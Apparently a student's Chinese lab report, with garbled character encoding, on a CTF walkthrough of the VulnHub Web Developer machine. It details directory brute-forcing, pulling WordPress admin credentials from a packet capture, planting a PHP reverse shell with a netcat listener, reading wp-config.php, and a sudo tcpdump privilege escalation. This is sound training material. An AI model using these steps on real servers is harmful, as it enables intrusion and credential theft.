网络渗透测试实验四
網(wǎng)絡滲透測試實驗報告
通過對目標靶機的滲透過程,了解CTF競賽模式,理解CTF涵蓋的知識范圍,如MISC、PPC、WEB等,通過實踐,加強團隊協(xié)作能力,掌握初步CTF實戰(zhàn)能力及信息收集能力。熟悉網(wǎng)絡掃描、探測HTTP web服務、目錄枚舉、提權(quán)、圖像信息提取、密碼破解等相關工具的使用,系統(tǒng)環(huán)境:Kali Linux 2、WebDeveloper靶機來源:https://www.vulnhub.com/
實驗工具:不限
目的:獲取靶機Web Developer 文件/root/flag.txt中flag。
基本思路:本網(wǎng)段IP地址存活掃描(netdiscover);網(wǎng)絡掃描(Nmap);瀏覽HTTP 服務;網(wǎng)站目錄枚舉(Dirb);發(fā)現(xiàn)數(shù)據(jù)包文件 “cap”;分析 “cap” 文件,找到網(wǎng)站管理后臺賬號密碼;插件利用(有漏洞);利用漏洞獲得服務器賬號密碼;SSH 遠程登錄服務器;tcpdump另類應用。
?2.:利用NMAP掃描目標主機,發(fā)現(xiàn)目標主機端口開放、服務情況,截圖并說明目標提供的服務有哪些?(利用第一次實驗知識點)
?
目標主機提供了ssh服務和http服務;
在虛擬機瀏覽器中打開掃描到的目標主機的IP地址,看到如下界面
Login in登錄后臺;
4.利用whatweb探測目標網(wǎng)站使用的CMS模板。截圖。分析使用的CMS是什么?
輸入whatweb -v 192.168.127.130(目標主機ip),得如下命令
分析到使用的CMS(內(nèi)容管理系統(tǒng))是WordPress site
WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它采用Ruby編寫,能夠掃描WordPress網(wǎng)站中的多種安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主題漏洞。最新版本W(wǎng)PScan的數(shù)據(jù)庫中包含超過18000種插件漏洞和2600種主題漏洞,并且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測當前已啟用的插件和其他功能。
WordPress是全球流行的博客網(wǎng)站,全球有上百萬人使用它來搭建博客。他使用PHP腳本和Mysql數(shù)據(jù)庫來搭建網(wǎng)站。
在kali輸入dirb http://192.168.127.130?爆破目錄網(wǎng)站,找到DIRECTORY:http://192.168.127.130/ipdata/
發(fā)現(xiàn)cap文件并下載;
把cap文件扔到wireshark分析抓包數(shù)據(jù),輸入http.request.method==POST過濾,找到想要抓包的數(shù)據(jù)
發(fā)現(xiàn)了目標主機網(wǎng)站的賬戶和密碼;
復制登錄http://192.168.127.130網(wǎng)站后臺;
在瀏覽器中搜索http://pentestmonkey.net/tools/web-shells/php-reverse-shell
點擊download,下載,并打開,復制其中的代碼;
在后臺中找到任意一個PHP頁面,利用剛剛復制到的代碼復制粘貼其中,修改代碼中反彈目標的IP地址“192.168.127.133”及端口“4444”
接下來,在kali中打開,輸入命令nc ?-lvp ?4444,利用NC開始監(jiān)聽,并打開瀏覽器訪問修改的PHP頁面,從而得到反彈shell(用戶www-data)。建立會話后,輸入cat/var/www/html/wp-config.php
查看wp-config.php獲得賬號及口令。
緊接著輸入
輸入命令ssh webdeveloper@192.168.127.133 (ssh ?用戶名@目標主機IP)
繼續(xù)輸入password;發(fā)現(xiàn)可以root權(quán)限執(zhí)行tcpdump命令,輸入下面的幾個命令
創(chuàng)建攻擊文件
touch /tmp/exploit1
寫入shellcode
echo 'cat /root/flag.txt' > /tmp/exploit
賦予可執(zhí)行權(quán)限
chmod +x /tmp/exploit
利用tcpdump執(zhí)行任意命令
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
找到flag;
實驗完成。
本次實驗我的收獲很大,學會了如何利用插件漏洞,用wireshake打開目標主機網(wǎng)站的數(shù)據(jù)庫文件并抓包,找到該網(wǎng)站管理后臺的用戶名和密碼,用枚舉dirb爆破網(wǎng)站目錄,獲得服務器的賬號密碼,讓它代替我們執(zhí)行一些命令,但是在實驗的過程中,對一些命令以及一些專業(yè)術(shù)語不太了解,還需要進一步查資料,記錄下來。
總結(jié)
- 上一篇: 更换elasticsearch数据存储目
- 下一篇: SASRec: Self-Attenti